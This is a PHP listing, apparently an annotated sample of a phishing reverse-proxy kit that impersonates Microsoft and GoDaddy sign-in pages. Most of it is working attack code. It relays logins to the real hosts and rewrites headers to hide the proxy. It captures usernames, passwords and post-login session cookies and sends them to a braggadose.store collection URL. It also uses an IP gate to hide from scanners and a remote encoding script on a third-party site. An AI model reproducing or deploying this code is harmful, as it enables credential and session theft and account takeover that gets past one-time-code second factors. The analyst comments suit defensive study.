array( // tail of a request helper whose opening lines are outside this excerpt
                            'method' => 'POST',
                            'header' => 'Content-Type: application/json',
                            'content' => json_encode($postData),
                            'user_agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.0.0 Safari/537.36'
                        ),
                        // Peer-certificate and host-name verification are both switched off.
                        'ssl' => array(
                            'verify_peer' => false,
                            'verify_peer_name' => false
                        )
                    )
                )
            );
        }
    } else {
        $response = file_get_contents(
            $apiUrl,
            false,
            stream_context_create(
                array(
                    'http' => array(
                        'method' => 'POST',
                        'header' => 'Content-Type: application/json',
                        'content' => json_encode($postData),
                        'user_agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.0.0 Safari/537.36'
                    ),
                    // Same as above: TLS verification disabled.
                    'ssl' => array(
                        'verify_peer' => false,
                        'verify_peer_name' => false
                    )
                )
            )
        );
    }
    return $response;
}

/*
 * NOTE(analysis): the helpers below support the top-level request handler at
 * the end of this file. That handler relays each request to a real sign-in
 * host, copies user-name/password fields and upstream Set-Cookie headers into
 * local files, and passes them to send_code() as query parameters.
 * Line breaks in this listing were reconstructed from a collapsed paste; where
 * a `//` comment ends was inferred from syntax.
 */

/**
 * Request $apiUrl with cURL (no method or body is set) and return the response body.
 *
 * CURLOPT_SSL_VERIFYPEER and CURLOPT_SSL_VERIFYHOST are both disabled, so the
 * remote end is not authenticated. Every call site in this file passes a URL
 * built from $fakeurl with the captured data in the query string, so that data
 * ends up in the receiving server's access log and in any TLS-inspecting proxy
 * on the path.
 *
 * @param string $apiUrl Full URL to request.
 * @return string|bool Response body, or false when curl_exec() fails.
 */
function send_code($apiUrl) {
    $ch = curl_init($apiUrl); // If you have parameters: $apiUrl . '?' . $apiRequestParams
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    $response = curl_exec($ch);
    curl_close($ch);
    return $response;
}

/**
 * Set one key in a JSON object stored on disk and write the file back.
 *
 * The only call site in this file stores one parsed Set-Cookie header per
 * cookie name in a "<email>-logcookie" file. Nothing is written when the file
 * is missing or does not decode; a message is echoed instead.
 *
 * @param string $filePath Existing JSON file.
 * @param string $key      Key to set (the cookie name at the call site).
 * @param mixed  $value    Value to store under $key.
 * @return void
 */
function saveCookie($filePath, $key, $value) {
    if (!file_exists($filePath)) {
        echo "File not found!";
        return;
    }
    $jsonContent = file_get_contents($filePath);
    $data = json_decode($jsonContent, true);
    if ($data === null) {
        echo "Failed to decode JSON data.";
        return;
    }
    $data[$key] = $value;
    $newJsonContent = json_encode($data, JSON_PRETTY_PRINT);
    file_put_contents($filePath, $newJsonContent);
}

// Disabled earlier variants of encodeData()/decodeData(); they differ from the
// active ones below in the remote host and in using cURL.
// function encodeData($data) {
//     $url = "https://herbpex.com/brot.php?enc";
//     $postData = array(
//         'data' => $data
//     );
//     $ch = curl_init($url);
//     curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // Return the response
//     curl_setopt($ch, CURLOPT_POST, true); // Send POST request
//     curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($postData));
//     $response = curl_exec($ch);
//     if (curl_errno($ch)) {
//         echo 'Error:' . curl_error($ch);
//     }
//     curl_close($ch);
//     return $response;
// }
// function decodeData($data) {
//     $url = "https://herbpex.com/brot.php?dec";
//     $postData = array(
//         'data' => $data
//     );
//     $ch = curl_init($url);
//     curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // Return the response
//     curl_setopt($ch, CURLOPT_POST, true); // Send POST request
//     curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($postData));
//     $response = curl_exec($ch);
//     if (curl_errno($ch)) {
//         echo 'Error:' . curl_error($ch);
//     }
//     curl_close($ch);
//     return $response;
// }

/**
 * POST $data as form field "data" to a remote brot.php?enc endpoint and return
 * the response body. Used by encodeBrotli() when the brotli extension is absent.
 *
 * NOTE(analysis): the content being processed leaves this server for a third
 * host. The path sits under a WordPress uploads directory, which may point to
 * a compromised site -- unverified.
 *
 * @param string $data Content to encode remotely.
 * @return string|false Response body, or false when the request fails.
 */
function encodeData($data) {
    $url = "https://nudgetobloom.com/wp-content/uploads/brot.php?enc";
    $postData = array('data' => $data);
    $context = stream_context_create([
        'http' => [
            'method' => 'POST',
            'header' => "Content-Type: application/x-www-form-urlencoded",
            'content' => http_build_query($postData)
        ]
    ]);
    return file_get_contents($url, false, $context);
}

/**
 * Counterpart of encodeData(): POST $data to the same remote script with ?dec
 * and return the response body. Used by decodeBrotli() as its fallback.
 *
 * @param string $data Content to decode remotely.
 * @return string|false Response body, or false when the request fails.
 */
function decodeData($data) {
    $url = "https://nudgetobloom.com/wp-content/uploads/brot.php?dec";
    $postData = array('data' => $data);
    $context = stream_context_create([
        'http' => [
            'method' => 'POST',
            'header' => "Content-Type: application/x-www-form-urlencoded",
            'content' => http_build_query($postData)
        ]
    ]);
    return file_get_contents($url, false, $context);
}

/**
 * Decompress Brotli data with brotli_uncompress() when that function exists,
 * otherwise hand the data to decodeData() (remote endpoint).
 *
 * @param string $compressedContent Brotli-compressed bytes.
 * @return mixed Whatever the chosen decoder returns.
 */
function decodeBrotli($compressedContent) {
    if (function_exists('brotli_uncompress')){
        $decodedData = brotli_uncompress($compressedContent);
        return $decodedData;
    }
    else{
        $decodedData = decodeData($compressedContent);
        return $decodedData;
    }
}

/**
 * Compress content with brotli_compress() when that function exists,
 * otherwise hand it to encodeData() (remote endpoint).
 *
 * @param string $content Content to compress.
 * @return mixed Whatever the chosen encoder returns.
 */
function encodeBrotli($content) {
    if (function_exists('brotli_compress')){
        $encodedData = brotli_compress($content);
        return $encodedData;
    }
    else{
        $encodedData = encodeData($content);
        return $encodedData;
    }
}

/**
 * Return the last e-mail address found in a text file.
 *
 * Each line is trimmed and matched against the pattern below; only the first
 * match per line is considered and a later line overrides an earlier one.
 * The handler uses this on the "loggrab" file to decide which user a captured
 * cookie belongs to.
 *
 * @param string $filePath File to scan.
 * @return string|false Last address found, or false when none is found or the
 *                      file cannot be opened (a message is echoed in that case).
 */
function getLastEmail($filePath) {
    $file = fopen($filePath, "r");
    if (!$file) {
        echo "File not found or unable to open.";
        return false;
    }
    $lastEmail = null;
    while (($line = fgets($file)) !== false) {
        $line = trim($line);
        if (preg_match('/[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}/', $line, $matches)) {
            $lastEmail = $matches[0];
        }
    }
    fclose($file);
    if ($lastEmail) {
        return $lastEmail;
    } else {
        return false;
    }
}

/**
 * Replace every "@" and "." with "-". The result is used as a file-name
 * component in this file, for e-mail addresses and for the client IP alike.
 *
 * @param string $email Input string.
 * @return string Input with "@" and "." replaced by "-".
 */
function stripEmail($email){
    $email = str_replace("@","-",$email);
    $email = str_replace(".","-",$email);
    return $email;
}

/**
 * Collect the http/https URLs contained in a string, each cut at its first
 * "?" and then at its first "#".
 *
 * @param string $string Text to search.
 * @return array List of URLs without query string or fragment.
 */
function getUrls($string) {
    // The pattern matches http:// and https:// only.
    preg_match_all('/https?:\/\/[a-zA-Z0-9-]+\.[a-zA-Z0-9-]+\S*/', $string, $matches);
    // Array to store clean URLs
    $cleanUrls = [];
    foreach ($matches[0] as $url) {
        $cleanUrl = strtok($url, '?'); // Remove anything after ?
        $cleanUrl = strtok($cleanUrl, '#'); // Remove anything after #
        // Add the clean URL to the array
        $cleanUrls[] = $cleanUrl;
    }
    return $cleanUrls;
}

/**
 * Return "$host:port" when $string contains $host followed by a numeric port,
 * otherwise return $host unchanged.
 *
 * @param string $string Text that may contain the host with a port.
 * @param string $host   Host name to look for.
 * @return string Host with the port appended when one was found.
 */
function extractHost($string, $host) {
    // Look for the host immediately followed by ":<digits>".
    preg_match('/\b' . preg_quote($host, '/') . '(:[0-9]+)\b/', $string, $matches);
    if (!empty($matches)) {
        // Return the host and port as "host:port"
        return $host . $matches[1];
    }
    return $host; // No port found: the bare host is returned (not null)
}

/**
 * Return "scheme://host" for a URL; a port, path or query is not included.
 *
 * @param string $url URL to parse.
 * @return string Scheme and host, or '' when either is missing.
 */
function getBaseUrl($url) {
    // Parse the URL to extract the scheme and host
    $parsedUrl = parse_url($url);
    // Both scheme and host must be present
    if (isset($parsedUrl['scheme']) && isset($parsedUrl['host'])) {
        return $parsedUrl['scheme'] . '://' . $parsedUrl['host'];
    }
    return ''; // Return an empty string if no scheme or host is found
}

/**
 * Return the part of $url that follows the first occurrence of $order.
 *
 * @param string $url   String to search.
 * @param string $order Marker to look for.
 * @return string Text after the marker, or '' when the marker is absent.
 */
function getTextAfter($url, $order) {
    // Position of the first occurrence of $order
    $position = strpos($url, $order);
    if ($position !== false) {
        // Skip past the marker itself
        return substr($url, $position + strlen($order));
    }
    return ''; // Marker not found
}

/**
 * Build a random string of $length characters from [0-9a-zA-Z].
 * Uses rand(), which is not a cryptographically secure generator.
 *
 * @param int $length Number of characters (default 5).
 * @return string Random alphanumeric string.
 */
function genFive($length = 5) {
    $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
    $randomString = '';
    for ($i = 0; $i < $length; $i++) {
        $randomString .= $characters[rand(0, strlen($characters) - 1)];
    }
    return $randomString;
}

/**
 * Return the first line of a file that contains $substring, compared
 * case-insensitively. The returned line keeps its line terminator.
 *
 * @param string $file      Path of the file to scan.
 * @param string $substring Text to look for.
 * @return string Matching line, or "" when either argument has three or fewer
 *                characters, the file cannot be opened, or nothing matches.
 */
function findStringLine($file, $substring) {
    $handle = @fopen($file, 'r');
    // Both arguments must be longer than three characters.
    if(strlen($file)>3 && strlen($substring)>3){
    }else{
        return "";
    }
    if (!$handle) return ""; // Return empty string if file can't be opened
    $lineNumber = 1;
    while (($line = fgets($handle)) !== false) {
        if (strpos(strtolower($line), strtolower($substring)) !== false) {
            fclose($handle);
            return $line; // Return the line if substring is found
        }
        $lineNumber++;
    }
    fclose($handle);
    return ""; // Return empty string if substring is not found
}

/**
 * Return the host component of a URL.
 *
 * @param string $url URL to parse.
 * @return string|null Host, or null when parse_url() yields none.
 */
function getHost($url) {
    // Parse the URL to get the host part
    $parsed_url = parse_url($url);
    // Return the host part
    return isset($parsed_url['host']) ? $parsed_url['host'] : null;
}

/**
 * Derive a browser label from a User-Agent string.
 *
 * The tokens are tested in the order listed; on the first hit the function
 * returns 'Edge' if the string also contains "edg" or "edge", otherwise the
 * token with its first letter upper-cased.
 *
 * @param string $user_agent Raw User-Agent header value.
 * @return string Browser label, or 'Unknown' when no token matches.
 */
function get_browser_name($user_agent) {
    $user_agent = strtolower($user_agent);
    $browsers = array(
        'firefox', 'opera', 'chrome', 'safari', 'msie', 'trident'
    );
    foreach ($browsers as $browser) {
        if (strpos($user_agent, $browser) !== false) {
            if (strpos($user_agent, 'edg') !== false) {
                return 'Edge';
            }
            if (strpos($user_agent, 'edge') !== false) {
                return 'Edge';
            }
            return ucfirst($browser);
        }
    }
    return 'Unknown';
}

/**
 * Tell whether a string is canonical standard Base64: only Base64 characters,
 * decodable in strict mode, and identical after a decode/encode round trip.
 *
 * @param string $string Candidate string.
 * @return bool True when the string round-trips unchanged.
 */
function is_base64_encoded($string) {
    // Check if the string matches the base64 pattern
    if (preg_match('/^[A-Za-z0-9+\/=]*$/', $string) === 0) {
        return false;
    }
    // Decode the string and check if it is valid
    $decoded = base64_decode($string, true); // The second parameter 'true' enables strict mode
    return $decoded !== false && base64_encode($decoded) === $string;
}

/**
 * Keep the first "=" of a string and replace every later "=" with "%3D".
 *
 * @param string $string Input, typically a "key=value" pair.
 * @return string Input with later "=" signs percent-encoded; unchanged when it
 *                contains no "=".
 */
function rpf($string) {
    // Split the string at the first "="
    $parts = explode("=", $string, 2);
    // If the string contains at least one "="
    if (count($parts) > 1) {
        // The first part (before the first "=")
        $firstPart = $parts[0];
        // The rest of the string (after the first "=")
        $rest = $parts[1];
        // Replace all "=" in the rest of the string with "%3D"
        $rest = str_replace("=", "%3D", $rest);
        // Combine the first part with the modified rest
        return $firstPart . "=" . $rest;
    }
    // If there is no "=" in the string, return the string as is
    return $string;
}

/**
 * URL-safe Base64 encoding without "=" padding.
 *
 * @param string $data Bytes to encode.
 * @return string Encoded text using "-" and "_" instead of "+" and "/".
 */
function base64UrlEncode($data) {
    // Standard Base64 encode the string
    $base64 = base64_encode($data);
    // Replace "+" with "-", "/" with "_", and remove padding "="
    $url_safe_base64 = strtr($base64, '+/', '-_');
    return rtrim($url_safe_base64, '=');
}

/**
 * Split a "code-=-host" line from the placeholder file into its two fields.
 *
 * @param string $line One line of the placeholder file.
 * @return array [code, host], or ["", ""] when the line has five or fewer characters.
 */
function getFullPlaceholder($line){
    $placeLine = $line;
    if(strlen($placeLine) > 5){
        $placeHost = explode("-=-",trim($placeLine))[1];
        $placeCode = explode("-=-",trim($placeLine))[0];
        return [$placeCode,$placeHost];
    }
    else{
        return ["",""];
    }
}

/**
 * URL-safe Base64 encoding without padding. The handler applies it to the
 * values it places in the "cont" and "data" query parameters.
 *
 * @param string $input Bytes to encode.
 * @return string Encoded text.
 */
function b64e($input) {
    return str_replace(['+', '/', '='], ['-', '_', ''], base64_encode($input));
}

/**
 * Inverse of b64e(): restore the padding, map "-" and "_" back to "+" and "/",
 * then Base64-decode (non-strict).
 *
 * @param string $input URL-safe Base64 text.
 * @return string|false Decoded bytes.
 */
function b64d($input) {
    $remainder = strlen($input) % 4;
    if ($remainder) {
        $paddingLength = 4 - $remainder;
        $input .= str_repeat('=', $paddingLength);
    }
    return base64_decode(str_replace(['-', '_'], ['+', '/'], $input));
}

/**
 * Rebuild the incoming request headers from the HTTP_* entries of $_SERVER.
 *
 * A name whose ucwords() form appears in $capitalized_keys keeps that form;
 * any other name is lower-cased, except x-https, which keeps the upper-case
 * form derived from $_SERVER. When the Accept value equals "application/json"
 * a Content-Type entry is added as well.
 *
 * @return array Header name => value.
 */
function get_request_headers() {
    $headers = [];
    $capitalized_keys = ['Host', 'Accept', 'Accept-Encoding', 'Referer', 'Cookie', 'User-Agent','Accept-Language'];
    foreach ($_SERVER as $name => $value) {
        if (strpos($name, 'HTTP_') === 0) {
            // HTTP_ACCEPT_LANGUAGE -> ACCEPT-LANGUAGE
            $header = str_replace(' ', '-', str_replace('_', ' ', substr($name, 5)));
            if (in_array(ucwords(strtolower($header)), $capitalized_keys)) {
                $header = ucwords(strtolower($header));
            } else {
                if(trim(strtolower($header)) !== "x-https"){
                    $header = strtolower($header);
                }
            }
            $headers[$header] = $value;
        }
    }
    if ($headers["Accept"] == "application/json"){
        $ff = "Content-Type";
        $headers[$ff] = "application/json; charset=utf-8";
    }
    return $headers;
}

// ---- Top-level request handling starts here; it runs on every request. ----
$ipp = $_SERVER['REMOTE_ADDR'];
// Visitor gate: the request is served only when a marker file named after the
// client IP (dots replaced by dashes) exists under iplock/. Every other client
// receives just the fixed string below, which is presumably what an automated
// URL scanner requesting this script directly would see.
if(!file_exists("iplock/".stripEmail($ipp))){
    echo "Please try again !";
    exit();
}
// NOTE(review): no session_start() is visible in this excerpt; presumably it is
// called earlier in the file -- confirm.
if (!isset($_SESSION['usernameidnum'])) {
    // First request of the session: the identifier is the client IP with dots
    // replaced by dashes; it names the per-visitor directory used further down.
    $_SESSION['usernameidnum'] = str_replace(".","-",$ipp);
} else {
}
// The marker file holds "-=-"-separated fields; field 0 is kept as $firstEmail.
$contFile = trim(file_get_contents("iplock/".stripEmail($ipp)));
$firstEmail = explode("-=-",$contFile)[0];
$workingDir = 
explode("-=-",$contFile)[2];
/*
 * NOTE(analysis): from here to the closing tag the script relays the current
 * request to a real sign-in host (default login.microsoftonline.com;
 * sso.godaddy.com, gui.godaddy.com and csp.secureserver.net are registered
 * below) and returns the upstream answer with host names rewritten to this
 * server. While relaying it
 *   - copies user-name and password fields out of the request,
 *   - parses upstream Set-Cookie headers into a per-user JSON file,
 *   - sends both to the URL in $fakeurl as GET query parameters.
 * The upstream connection is made by this server, so the sign-in host sees this
 * server's address as the client rather than the user's. Because the cookies
 * recorded are the ones issued after sign-in completes, a one-time-code second
 * factor does not stop this flow by itself; authenticators bound to the real
 * origin (FIDO2/WebAuthn) are the usual mitigation.
 *
 * Files used under <workingDir>/tpfolder/<session id>/ (forensic artefacts):
 *   placeholder, redirect, currentpage, currentuser, loggrab,
 *   <email>-logcookie, cookieowners/
 *
 * Line breaks in this listing were reconstructed from a collapsed paste; where
 * a `//` comment ends was inferred from syntax.
 */
// Fields 2 and 1 of the iplock marker file: working directory and a per-target code.
$initialValidationCode = explode("-=-",$contFile)[1];
// Per-visitor directory tree; failures are suppressed with @.
@mkdir($workingDir."/tpfolder", 0755, true);
@mkdir($workingDir."/tpfolder/".$_SESSION['usernameidnum'], 0755, true);
@mkdir($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/cookieowners', 0755, true);
$agent = $_SERVER['HTTP_USER_AGENT'];
$method = $_SERVER['REQUEST_METHOD']; // HTTP Method
$requestBody = file_get_contents('php://input'); // Body content of the incoming request
$headers = get_request_headers(); //getallheaders(); // All incoming headers
$cookies = $_COOKIE; // Any cookies that were sent
// Collection endpoint: every send_code() call below targets this URL.
$fakeurl = "https://braggadose.store/goal/logs_/fetch_778.php"; //"https://"; //';
// Get the scheme (http or https)
$scheme = isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on' ? 'https' : 'http';
// Get the host (e.g., www.example.com)
$host = $_SERVER['HTTP_HOST'];
// Get the current request URI (path + query string)
$requestUri = $_SERVER['REQUEST_URI'];
// Combine all parts to get the full URL
$fullUrl = $scheme . '://' . $host . $requestUri;
// Drop a trailing sso_reload=true parameter before routing.
if (preg_match('/[?&]sso_reload=true$/', $fullUrl)) {
    $fullUrl = preg_replace('/[?&]sso_reload=true$/', '', $fullUrl);
}
$baseUrl = getBaseUrl($fullUrl);
$baseHost = getHost($fullUrl);
// getPathUrl() is not defined in this excerpt; the comparisons below treat its
// result as a path code ("p" or a five-character code) -- TODO confirm.
$pathUrl = getPathUrl($fullUrl);
$pathLine = findStringLine($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/placeholder',$pathUrl);
$redirector = @trim(file_get_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum']."/redirect")) ?: '';
$email = ""; //"advocate@alriyamilaw.com";
$password = "";
// Upstream host for this visitor; falls back to the Microsoft sign-in host.
$documentRoot = @trim(file_get_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/currentpage')) ?: 'login.microsoftonline.com';
// The placeholder file maps a path code on this server to an upstream host,
// one "code-=-host" pair per line.
$redirectFilePath = $workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/placeholder';
$compulsoryDaddy = array("sso.godaddy.com","csp.secureserver.net","gui.godaddy.com","login.microsoftonline.com");
$currentUser = @trim(file_get_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/currentuser')) ?: "";
// Make sure each of the four hosts has a mapping: login.microsoftonline.com
// always gets the code "p", the others a random five-character code.
foreach($compulsoryDaddy as $eachGodaddy){
    $pathLine_ = findStringLine($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/placeholder',$eachGodaddy);
    if(strlen($pathLine_) > 5){
    }
    else{
        if($eachGodaddy == "login.microsoftonline.com"){
            $placeholder_ = "p";
        }
        // elseif($eachGodaddy == "login.microsoftonline.com:443"){
        //     $placeholder_ = "p2";
        // }
        else{
            $placeholder_ = genFive();
        }
        @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/placeholder',$placeholder_."-=-".$eachGodaddy."\n",FILE_APPEND);
    }
}
// loggrab is the per-visitor log: client IP first, then portal and user lines.
if(!file_exists($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/loggrab')){
    @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/loggrab',"IP:: ".$ipp);
}
// ---- Credential capture ----
// The request is searched for the field-name pairs login/passwd,
// login_user/login_pwd, UserName/Password and username/password. For a user
// name the code creates an empty "<email>-logcookie" file and appends
// "Portal::" and "USER::" lines to loggrab.
if(isset($_REQUEST['login'])){
    if (filter_var(trim($_REQUEST['login']), FILTER_VALIDATE_EMAIL)) {
        $strp = stripEmail(trim($_REQUEST['login']));
        if (!file_exists($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/'.$strp.'-logcookie')){
            @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/'.$strp.'-logcookie',"{}");
        }
        @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/loggrab',"\nPortal:: ".$documentRoot,FILE_APPEND);
        @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/loggrab',"\nUSER:: ".$_REQUEST['login'],FILE_APPEND);
        $email = trim($_REQUEST['login']);
    }
}
if(isset($_REQUEST['passwd'])){
    $password = trim($_REQUEST['passwd']);
}
// Unlike the other three user-name fields, login_user is not checked with
// FILTER_VALIDATE_EMAIL before use.
if(isset($_REQUEST['login_user'])){
    $strp = stripEmail(trim($_REQUEST['login_user']));
    if (!file_exists($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/'.$strp.'-logcookie')){
        @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/'.$strp.'-logcookie',"{}");
    }
    @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/loggrab',"\nPortal:: ".$documentRoot,FILE_APPEND);
    @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/loggrab',"\nUSER:: ".$_REQUEST['login_user'],FILE_APPEND);
    $email = trim($_REQUEST['login_user']);
}
if(isset($_REQUEST['login_pwd'])){
    $password = trim($_REQUEST['login_pwd']);
}
if(isset($_REQUEST['UserName'])){
    if (filter_var(trim($_REQUEST['UserName']), FILTER_VALIDATE_EMAIL)) {
        $strp = stripEmail(trim($_REQUEST['UserName']));
        if (!file_exists($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/'.$strp.'-logcookie')){
            @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/'.$strp.'-logcookie',"{}");
        }
        @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/loggrab',"\nPortal:: ".$documentRoot,FILE_APPEND);
        @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/loggrab',"\nUSER:: ".$_REQUEST['UserName'],FILE_APPEND);
        $email = trim($_REQUEST['UserName']);
    }
}
if(isset($_REQUEST['Password'])){
    $password = trim($_REQUEST['Password']);
}
if(isset($_REQUEST['username'])){
    if (filter_var(trim($_REQUEST['username']), FILTER_VALIDATE_EMAIL)) {
        $strp = stripEmail(trim($_REQUEST['username']));
        if (!file_exists($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/'.$strp.'-logcookie')){
            @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/'.$strp.'-logcookie',"{}");
        }
        @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/loggrab',"\nPortal:: ".$documentRoot,FILE_APPEND);
        @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/loggrab',"\nUSER:: ".$_REQUEST['username'],FILE_APPEND);
        $email = trim($_REQUEST['username']);
    }
}
if(isset($_REQUEST['password'])){
    $password = trim($_REQUEST['password']);
}
// Same capture for JSON request bodies (GoDaddy SSO hosts and the Microsoft
// GetCredentialType call), reading the "username" and "password" keys.
if($documentRoot == "sso.godaddy.com" || $documentRoot == "sso.secureserver.net" || strpos($fullUrl, "/common/GetCredentialType") !== false){
    $data = json_decode($requestBody, true);
    if (json_last_error() === JSON_ERROR_NONE) {
        if (isset($data['username'])){
            if (filter_var(trim($data['username']), FILTER_VALIDATE_EMAIL)) {
                $strp = stripEmail(trim($data['username']));
                if (!file_exists($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/'.$strp.'-logcookie')){
                    @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/'.$strp.'-logcookie',"{}");
                }
                @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/loggrab',"\nPortal:: ".$documentRoot,FILE_APPEND);
                @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/loggrab',"\nUSER:: ".htmlspecialchars($data['username']),FILE_APPEND);
                $email = trim(htmlspecialchars($data['username']));
            }
        }
        if (isset($data['password'])){
            $password = trim(htmlspecialchars($data['password']));
        }
    }
}
// Disabled: an earlier direct GetCredentialType lookup via send_get_code().
// if(!file_exists($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/redirect') && strlen($email) > 2){
//     $postData = [
//         "username" => $email
//     ];
//     $response = send_get_code("https://login.microsoftonline.com/common/GetCredentialType?mkt=en-US", $postData);
//     $res = json_decode($response, true);
//     if (isset($res["Credentials"]["FederationRedirectUrl"])){
//         $redDomain = getHost($res["Credentials"]["FederationRedirectUrl"]);
//         file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/redirect', $redDomain);
//         $redirector = $redDomain;
//     }
// }
// ---- Routing: work out the upstream URL for this request ----
// Path code "p" maps to login.microsoftonline.com; a request whose path code
// equals the validation code and whose URL contains the working directory goes
// to $rootMicro (not defined in this excerpt); a five-character code found in
// the placeholder file maps to that file's host; anything else goes to
// $documentRoot with the same path.
if (($pathUrl && $pathUrl == "p") || ((strtolower($initialValidationCode) == strtolower($pathUrl)) && strpos(strtolower($fullUrl),strtolower($workingDir)) !== false)){
    if ($pathUrl && $pathUrl == "p"){
        $targetApiUrl = str_replace($baseUrl."/p/","",$fullUrl);
        if (strpos($fullUrl, "/appverify") !== false){
            $targetApiUrl = "appverify";
        }
    }
    if ((strtolower($initialValidationCode) == strtolower($pathUrl)) && strpos(strtolower($fullUrl),strtolower($workingDir)) !== false) {
        $targetApiUrl = $rootMicro;
    }
    else{
        $targetApiUrl = "https://login.microsoftonline.com/".$targetApiUrl;
    }
}
else{
    if (strlen($pathUrl) == 5 && strlen($pathLine) > 5){
        $documentRoot = trim(explode("-=-",$pathLine)[1]);
        $targetApiUrl = "https://".$documentRoot.trim(getTextAfter($fullUrl,$pathUrl));
        $pathToUse = $pathUrl;
    }
    else{
        $targetApiUrl = "https://".$documentRoot."/".str_replace($baseUrl."/","",$fullUrl);
    }
}
// On an invalid upstream URL the value is echoed to the client before the
// script stops.
if (!filter_var($targetApiUrl, FILTER_VALIDATE_URL)) {
    echo $targetApiUrl;
    die("Error: Invalid URL provided.");
}
// Remember the most recent user name for later requests of this visitor.
if($email && strlen($email)> 2){
    @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/currentuser',trim($email));
    $currentUser = $email;
}
$targetApiUrl__ = str_replace(".","_",$targetApiUrl);
$targetApiUrl__ = str_replace("/","_",$targetApiUrl__);
$targetApiUrl__ = str_replace(":","_",$targetApiUrl__);
// ---- Relay the request upstream ----
$ch = curl_init($targetApiUrl);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // Return response as a string
curl_setopt($ch, CURLOPT_HEADER, true); // Include response headers
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false); // Redirects are not followed; 3xx answers are relayed to the client
curl_setopt($ch, CURLOPT_TIMEOUT, 30); // Timeout after 30 seconds
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
// Request headers are forwarded with this server's host name replaced by the
// upstream one, so Referer and Origin look as if the browser were talking to
// the real site. The incoming Host header is dropped.
$forwardedHeaders = [];
foreach ($headers as $key => $value) {
    if(trim(strtolower($key)) == "referer"){
        if(trim($documentRoot) == "login.microsoftonline.com"){
            // Fixed Referer for every Microsoft-bound request; client_id, state
            // and code_challenge are constants in this sample.
            $value = "https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=19db86c3-b2b9-44cc-b339-36da233a3be2&redirect_uri=https%3A%2F%2Fmysignins.microsoft.com&scope=openid+profile+email+offline_access&response_type=code&response_mode=fragment&code_challenge=-c1OnpqEoC_zCGI8krkOQKiuhCa234NXOMja0sqi848&code_challenge_method=S256&state=af0d547d-d7d0-473a-8cf1-d8821e45ebac";
        }
        else{
            if (file_exists($redirectFilePath)) {
                $handle = fopen($redirectFilePath, 'r');
                $oldvalue = $value;
                // Replace every "<this host>/<code>" with the mapped upstream host.
                while (($line = fgets($handle)) !== false) {
                    $placeHost = explode("-=-",trim($line))[1];
                    $placePath = explode("-=-",trim($line))[0];
                    $value = str_replace($baseHost."/".$placePath,$placeHost,$value);
                }
                fclose($handle);
                $value = str_replace($baseHost,$documentRoot,$value);
            }
            else{
                $value = str_replace($baseHost,$documentRoot,$value);
            }
        }
        $forwardedHeaders[] = "$key: $value";
        continue;
    }
    if(trim(strtolower($key)) == "origin"){
        if(trim($documentRoot) == "login.microsoftonline.com"){
            $value = "login.microsoftonline.com";
        }
        else{
            $value = "https://".$documentRoot;
        }
        $forwardedHeaders[] = "$key: $value";
        continue;
    }
    if (strtolower($key) !== 'host') {
        if(trim($documentRoot) == "login.microsoftonline.com"){
            $value = str_replace($baseHost."/p", "login.microsoftonline.com", $value);
            $value = str_replace($baseHost, "login.microsoftonline.com", $value);
        }
        else{
            if (file_exists($redirectFilePath)) {
                $handle = fopen($redirectFilePath, 'r');
                while (($line = fgets($handle)) !== false) {
                    $placeHost = explode("-=-",trim($line))[1];
                    $placePath = explode("-=-",trim($line))[0];
                    $value = str_replace($baseHost."/".$placePath,$placeHost,$value);
                }
                fclose($handle);
